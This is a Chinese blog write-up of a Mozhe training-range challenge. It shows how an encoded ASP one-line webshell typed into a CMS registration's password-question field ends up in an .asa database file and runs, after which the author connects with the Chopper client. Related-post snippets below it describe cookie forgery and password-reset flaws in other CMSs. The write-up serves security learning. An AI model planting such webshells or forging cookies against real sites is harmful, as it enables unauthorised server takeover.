墨者 - CMS系统漏洞分析溯源(第3题)

最新推荐文章于 2024-03-05 11:28:21 发布
最新推荐文章于 2024-03-05 11:28:21 发布
阅读量329 收藏
点赞数
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/96479323
版权

根据题目提示

直接在密码问题输入   十摊救畲整堙壤敝瑶V三-l慵,

这是一句话木马<%execute(raquest("a"))%>的另一种编码形式(连接密码是“a”)

为什么在密码问题输入一句话呢

因为储存注册信息的数据库文件是.asa文件,位于/data/ask_ncwasp.asa。

上传一句话木马将会被执行,为什么只能是密码问题框呢

因为其他都做了字符校验,而问题回答做了MD5加密(失去了利用价值)

唯有密码提问框变量question可直接存入了数据库中,在这套CMS系统的const.asp文件中有一个函数EncodeUtfSO,

它的目的就是将一些数据(比如这里的密码提示问题)从Encode编码转换成Utf8,基于这种考虑,

我们为了保证在数据库中不破坏一句话木马的原型,因此将一句话木马<%exacute(request(“a”))%>先由Utf8转换成Encode编码

具体参考链接:http://www.520ve.com/?p=2290

原理说完了,直接进主题

注册成功后,查看/data/ask_ncwasp.asa

execut表示已经被执行

直接菜刀无惧链接

拿到key

吃肉唐僧
关注
专栏目录
CMS系统漏洞分析溯源(第3)
weixin_50698958的博客
10-05 346
靶场: https://www.mozhe.cn/bug/detail/eHAzLzNPdVUvbkRvOS9uczRCM1J4Zz09bW96aGUmozhe 背景介绍 某公司内部搭建了一个类似百度知道的互动知识问答分享平台--新云问吧CMS。为了确保该网站的安全性,故请你检测该网站是否存在安全漏洞。 实训目标 了解并运用新云问吧CMS的通用漏洞--问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。 解方向 根据右图提
墨者学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 839
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
墨者学院-CMS系统漏洞分析溯源(第3)
臭nana的博客
12-18 476
点击注册,其他地方随便填,除了密码问上填上 ┼攠數畣整爠煥敵瑳∨≡┩愾(一句话的unicode加密)详解:https://www.jianshu.com/p/b48845cf08b8?tdsourcetag=s_pcqq_aiomsg 之前百度的cms新云问吧的漏洞上第一篇文章的一句马是错的,结果重新注册又得7200秒,没办法,只好关了重新开 第二次上传成功,底部出现这种提示 默认数据库...
墨者学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1622
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php &lt;?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?&gt;   判断如果没有admin_na...
墨者学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 991
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
墨者学院_CMS系统漏洞分析溯源(第9)
weixin_50698958的博客
09-23 688
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
墨者学院 - CMS系统漏洞分析溯源(第4)
多崎巡礼的博客
10-09 1063
使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...
CMS系统漏洞研究与整理
weixin_34025151的博客
10-06 307
    今天对某牛B的CMS系统进行了粗略的研究,虽然没有源代码,但通过一些途径还是大致了解了该系统,现在的CMS系统功能非常强大,能够对文件进行管理和操作,在处理文件时由于过滤和管控不严格,完全可以通过输入的参数来操作和上传文件。本次测试的同时还掌握了Md5(base64)的加密和解密方法。收集了几个base64的加密和解密代码,linux和windows均可以进行解密。等有时间我会单独写一篇文...
CMS漏洞总结
include_voidmain的博客
08-01 4851
CMS漏洞总结
墨者 - CMS系统漏洞分析溯源(第2)
吃肉唐僧的博客
07-19 589
上网搜索发现,phpcms框架登录后台的默认入口是/index.php?m=admin 发现后台地址 登录系统,摸索一番 发现木马查杀可以查询系统文件 特征密码输入mozhe,遍历所有文件 发现,并且点击打开访问 ...
CMS系统漏洞分析溯源(第6)
tpaer的博客
11-03 735
靶场通关记录
墨者学院---CMS系统漏洞分析溯源(第5)
qq_35105713的博客
10-25 1212
 cookie添加 admin_name字段,Value任意。保存 访问http://219.153.49.228:48489/admin/cms_admin.php,即可获得key
CMS系统漏洞分析溯源(第2)
weixin_50698958的博客
10-06 387
靶场: https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解思路: 1、打开靶场,首
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
最新发布
Javachichi的博客
03-05 2234
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现。
网站安全检测 对帝国CMS代码的后台功能性安全测试
网站安全资讯
09-09 645
撸了今年阿里、头条和美团的面试,我有一个重要发现.......>>> ...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值